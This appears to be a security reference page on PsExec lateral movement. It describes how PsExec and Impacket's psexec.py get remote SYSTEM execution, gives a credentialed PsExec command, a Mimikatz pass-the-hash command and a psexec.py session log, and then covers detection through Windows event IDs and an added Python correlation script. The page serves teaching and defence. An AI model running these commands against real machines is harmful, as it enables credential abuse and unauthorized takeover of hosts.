PSExec
Administrator rights on the target machine are mandatory.
PsExec is part of the Sysinternals tool suite and has been reimplemented in the Impacket suite (which works almost the same way). The tool is a Microsoft-signed binary, which makes it generally reliable in most Windows environments. It executes commands on a remote system by:
Connecting to the ADMIN$ share (C:\Windows).
Uploading a PSEXESVC.exe file.
Using the Service Control Manager (sc) to start the binary as a service running as NT AUTHORITY\SYSTEM (the Sysinternals PsExec starts a service named PSEXESVC by default, whereas Impacket's psexec.py spawns a process with a randomly generated 4-character name).
Creating a named pipe on the target and using it for I/O operations.
Running the program as a child of PSEXESVC.exe, whose own parent process is services.exe.
When the task completes, the PSEXESVC service is stopped and PSEXESVC.exe is deleted from ADMIN$.
In general, most defensive tools will detect (or at least are able to detect) lateral movement via PsExec.
psexec.exe /accepteula \\<IP> -u DOMAIN\USERNAME -p PASSWORD cmd.exe
By default, PsExec does not support the pass-the-hash technique. However, Mimikatz can be used to perform a pass-the-hash attack and PsExec is then run from the resulting prompt:
# Open a command prompt with the NTLM hash of a user using Mimikatz:
mimikatz > sekurlsa::pth /user:<USERNAME> /domain:<DOMAIN> /ntlm:<HASH_NTLM>
# Then run PsExec from the spawned prompt
PsExec.exe /accepteula \\<IP> cmd.exe
Example session with Impacket's psexec.py:
$ psexec.py Administrator:<PASSWORD>@10.10.0.4 -debug
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket
[+] StringBinding ncacn_np:10.10.0.4[\pipe\svcctl]
[*] Requesting shares on 10.10.0.4.....
[*] Found writable share ADMIN$
[*] Uploading file BXtvAhde.exe
[*] Opening SVCManager on 10.10.0.4.....
[*] Creating service IcsJ on 10.10.0.4.....
[*] Starting service IcsJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1935]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Detection
Given that PSEXESVC.exe is written to the target's network share (ADMIN$), it is possible to correlate events such as:
File creation.
Service installation.
Process start.
Logs:
Event ID 5145 from the Windows event log (confirms that the network share was accessed) is recorded.
Event ID 7045 for the initial installation of the service is also recorded.
The presence of the PSEXESVC.exe file is an indication that PsExec was used to gain access to the target machine.
Event ID 4697: a service was created on the system.
psexec_psh, used by Cobalt Strike, does not copy a binary to the target; instead it executes a one-line PowerShell command (always 32-bit).
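As a defender's illustration of the correlation described above, the following is an added Python example (not part of the original page and not code from Sysinternals, Impacket or Cobalt Strike). It applies the rules from the Detection section to constructed event records: an ADMIN$ write (5145) is linked to a service install (7045/4697) on the same host, the Sysinternals default name PSEXESVC and the 4-letter names psexec.py uses are tagged, and a service whose image is a PowerShell one-liner with no dropped binary is flagged as the psexec_psh pattern. The event field names, the 60-second correlation window and every sample record are assumptions; a real deployment would populate the fields from the Security and System logs.

```python
import re
from collections import defaultdict

# Event IDs named in the Detection section above.
SHARE_ACCESS = 5145            # network share object accessed
SVC_INSTALLED_SYSTEM = 7045    # System log: a service was installed
SVC_INSTALLED_SECURITY = 4697  # Security log: a service was installed

# Assumption: the ADMIN$ write and the matching service install are at most this far apart.
CORRELATION_WINDOW = 60
# psexec.py names its service with 4 random letters (IcsJ in the session above).
IMPACKET_SVC_NAME = re.compile(r"^[A-Za-z]{4}$")

# Constructed sample events (not real logs), reduced to the fields the rules need.
# "time" is seconds from an arbitrary epoch. WS01 mirrors the page's psexec.py session
# (service IcsJ, upload BXtvAhde.exe); SRV02 mirrors a default Sysinternals run.
SAMPLE_EVENTS = [
    {"id": 5145, "time": 100, "host": "WS01", "share": r"\\*\ADMIN$", "target": "BXtvAhde.exe",
     "access": "WriteData", "src_ip": "10.10.0.9", "user": "Administrator"},
    {"id": 7045, "time": 101, "host": "WS01", "service": "IcsJ",
     "image": r"%systemroot%\BXtvAhde.exe", "account": "LocalSystem"},
    {"id": 4697, "time": 101, "host": "WS01", "service": "IcsJ",
     "image": r"%systemroot%\BXtvAhde.exe", "account": "LocalSystem"},
    {"id": 5145, "time": 200, "host": "SRV02", "share": r"\\*\ADMIN$", "target": "PSEXESVC.exe",
     "access": "WriteData", "src_ip": "10.10.0.9", "user": "jdoe"},
    {"id": 7045, "time": 201, "host": "SRV02", "service": "PSEXESVC",
     "image": r"%SystemRoot%\PSEXESVC.exe", "account": "LocalSystem"},
    # psexec_psh-like: nothing written to ADMIN$, the service image is a PowerShell one-liner
    {"id": 7045, "time": 300, "host": "SRV03", "service": "UpdateSvc",
     "image": "powershell.exe -NoProfile -Command <constructed one-liner>", "account": "LocalSystem"},
    # Benign noise: a document read on a user share and a vendor agent install
    {"id": 5145, "time": 400, "host": "WS01", "share": r"\\*\Users", "target": "report.docx",
     "access": "ReadData", "src_ip": "10.10.0.20", "user": "jdoe"},
    {"id": 7045, "time": 500, "host": "WS04", "service": "Backup Agent",
     "image": r"C:\Program Files\Vendor\agent.exe", "account": "LocalSystem"},
]


def image_exe(image_path: str) -> str:
    """Lower-cased file name of the first .exe in a service ImagePath (quotes and arguments tolerated)."""
    m = re.search(r'([^\\/"\s]+\.exe)', image_path, re.IGNORECASE)
    return m.group(1).lower() if m else ""


def correlate(events):
    """Return one alert per suspicious service install, correlated per host."""
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)

    alerts = []
    for host, evs in by_host.items():
        # 5145 records for files written to ADMIN$ (the PSEXESVC.exe / random .exe upload step)
        admin_writes = [e for e in evs if e["id"] == SHARE_ACCESS
                        and e["share"].upper().endswith("ADMIN$")
                        and "WRITE" in e["access"].upper()]
        seen = set()  # 7045 and 4697 describe the same install; report it once
        for svc in evs:
            if svc["id"] not in (SVC_INSTALLED_SYSTEM, SVC_INSTALLED_SECURITY) or svc["service"] in seen:
                continue
            seen.add(svc["service"])
            exe = image_exe(svc["image"])
            # An ADMIN$ write of the very file the service points at, shortly before the install
            dropped = [w for w in admin_writes
                       if w["target"].lower() == exe
                       and 0 <= svc["time"] - w["time"] <= CORRELATION_WINDOW]
            indicators = []
            if dropped:
                indicators.append("executable written to ADMIN$ then installed as a service")
            if svc["service"].upper() == "PSEXESVC" or exe == "psexesvc.exe":
                indicators.append("Sysinternals PsExec default service/binary name")
            elif dropped and IMPACKET_SVC_NAME.match(svc["service"]):
                indicators.append("random 4-letter service name (Impacket psexec.py pattern)")
            if exe == "powershell.exe" and not dropped:
                indicators.append("service runs a PowerShell one-liner, no binary dropped (psexec_psh-like)")
            if indicators:
                alerts.append({
                    "host": host,
                    "service": svc["service"],
                    "image": svc["image"],
                    "source_ip": dropped[0]["src_ip"] if dropped else None,
                    "user": dropped[0]["user"] if dropped else None,
                    "indicators": indicators,
                })
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"{a['host']}: service {a['service']!r} from {a['source_ip']} -> {'; '.join(a['indicators'])}")
```

The 4-letter name is deliberately only a supporting indicator: legitimate services with short names exist, so it is reported only together with a matching ADMIN$ write. The PowerShell rule fires only when no binary was dropped, which is exactly the property the text attributes to psexec_psh.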